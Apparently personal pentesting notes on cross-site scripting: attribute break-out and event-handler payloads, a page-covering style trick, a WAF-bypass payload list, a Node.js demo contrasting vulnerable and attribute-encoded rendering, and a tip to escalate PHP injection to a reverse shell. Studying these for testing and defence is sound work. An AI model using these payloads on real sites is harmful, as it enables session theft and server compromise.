Some XSS alerts to test
https://www.youtube.com/watch?v=eQFbG6CwwdI
https://portswigger.net/support/xss-beating-html-sanitizing-filters
https://melotover.medium.com/how-i-bypassed-a-tough-waf-to-steal-user-cookies-using-xss-da75f28108e4
Not like this (the payload never leaves the quoted value attribute, so the browser treats it as text and nothing runs):
<input type="text" name="cn" size="20" maxlength="20" value="<script>alert(1);</script>">
Like this, closing the attribute and the tag and then opening a script element:
<input type="text" name="cn" size="20" maxlength="20" value=""><script>alert(1)</script>">
Or stay inside the tag and add an event handler (this survives a filter that only strips <script>, but the mouse has to enter a 20-character box):
<input type="text" name="cn" size="20" maxlength="20" value="" onmouseenter="alert(1)" x="">
Or add a style that stretches the element over the whole page, with the payload:
" onmouseenter="alert(1)" style="display:block;position:absolute;top:0;left:0;width:50000px;height:50000px;z-index:999999;
This then becomes:
<input type="text" name="cn" size="20" maxlength="20" value="" onmouseenter="alert(1)" style="display:block;position:absolute;top:0;left:0;width:50000px;height:50000px;z-index:999999;">
The style here looks like a mouthful but it's quite simple:
- Make the element display as a block element (so we can size it arbitrarily)
- Make the element's position absolute within the window (so we can set its position to anywhere)
- Move the element to (0,0)
- Make the element completely fill the page (so the user's mouse has to enter it!)
- Make the element appear on top of everything else.
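The difference between the failing and the working payloads above, as an added example (this is not code from the notes or from the linked posts): a renderer that interpolates the field straight into value="..." next to one that only strips <script> and one that attribute-encodes the value, plus a small tokenizer for the first <input> tag that reports whether a payload landed as an event handler on the tag, as a style, or as a <script> element after it. All function names and the PAYLOADS table are choices made here; it runs with plain Node.js.

```javascript
// Added example, not from the original notes: why "not like this" fails and
// the "like this" payloads work when input is dropped into value="...".
// Function names and PAYLOADS are assumptions made for this example.

// Vulnerable: raw string interpolation into a quoted attribute.
function renderInputVulnerable(cn) {
  return `<input type="text" name="cn" size="20" maxlength="20" value="${cn}">`;
}

// Weak fix: only strips <script>...</script>; the handler payloads are built for this.
function renderInputStripScript(cn) {
  const stripped = String(cn).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
  return `<input type="text" name="cn" size="20" maxlength="20" value="${stripped}">`;
}

// Real fix: encode the characters that can end the attribute or the tag.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderInputHardened(cn) {
  return `<input type="text" name="cn" size="20" maxlength="20" value="${escapeAttr(cn)}">`;
}

// Minimal tokenizer for the first <input ...> tag: collects its attributes the way a
// browser would (a quoted value may contain '>') and returns the markup after the tag.
// Deliberately small; not a full HTML parser.
function parseFirstInput(html) {
  let i = html.indexOf('<input') + '<input'.length;
  const attrs = [];
  const ws = (c) => c === ' ' || c === '\t' || c === '\n';
  while (i < html.length && html[i] !== '>') {
    while (i < html.length && ws(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    let name = '';
    while (i < html.length && !ws(html[i]) && html[i] !== '=' && html[i] !== '>') name += html[i++];
    while (i < html.length && ws(html[i])) i++;
    let value = null;
    if (html[i] === '=') {
      i++;
      while (i < html.length && ws(html[i])) i++;
      value = '';
      if (html[i] === '"' || html[i] === "'") {
        const q = html[i++];
        while (i < html.length && html[i] !== q) value += html[i++];
        i++; // closing quote
      } else {
        while (i < html.length && !ws(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    attrs.push({ name: name.toLowerCase(), value });
  }
  return { attrs, after: html.slice(i + 1) };
}

// What matters to the attacker: an on* handler on the tag, the page-filling style,
// or a <script> element that ended up outside the attribute.
function classify(html) {
  const { attrs, after } = parseFirstInput(html);
  return {
    handlers: attrs.filter((a) => a.name.startsWith('on')).map((a) => a.name),
    hasStyle: attrs.some((a) => a.name === 'style'),
    scriptAfterTag: /<script[\s>]/i.test(after),
  };
}
function exploitable(r) {
  return r.handlers.length > 0 || r.scriptAfterTag;
}

// The payloads from the notes above.
const PAYLOADS = {
  notLikeThis: '<script>alert(1);</script>',
  breakOut: '"><script>alert(1)</script>',
  handler: '" onmouseenter="alert(1)" x="',
  handlerFullPage: '" onmouseenter="alert(1)" style="display:block;position:absolute;top:0;left:0;width:50000px;height:50000px;z-index:999999;',
};

for (const [name, p] of Object.entries(PAYLOADS)) {
  console.log(name,
    'raw:', exploitable(classify(renderInputVulnerable(p))),
    'strip-script:', exploitable(classify(renderInputStripScript(p))),
    'encoded:', exploitable(classify(renderInputHardened(p))));
}
```

Run it with node. The raw renderer reports the three "like this" payloads as exploitable and the "not like this" one as harmless; stripping <script> stops the break-out payload but not the two onmouseenter ones, because they never need a script element; attribute-encoding on output stops all four, which is the fix to ask for.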
XSS:
javascript:alert(document.cookie)
<img src=1 onerror=alert(1)>
product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
https://site.com/out?callback=anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f
I tested with <s>strikethrough?</s> and HTML Injection successfully worked.
Then I tried the basic XSS payload (<script>alert(1)</script>)
But a WAF was in place…
<div onpointerover="alert('XSS POC by mrsinister15')">Please put your mouse on me to see the magic ;)</div><svg/onload=alert(1)>
In the best case you should also try injecting PHP code, for example <?php echo(1); ?>. If the page outputs 1 instead of your tag, the server is executing your input as PHP and you can move on to a reverse shell for RCE. This only works when the input ends up inside a file that PHP executes (a .php file the application writes or includes), not in a reflected or DOM XSS: in an ordinary reflection the browser hides <?php ... ?> as a bogus comment, so check view-source to see whether the tag came back verbatim (not executed) or was replaced by 1.
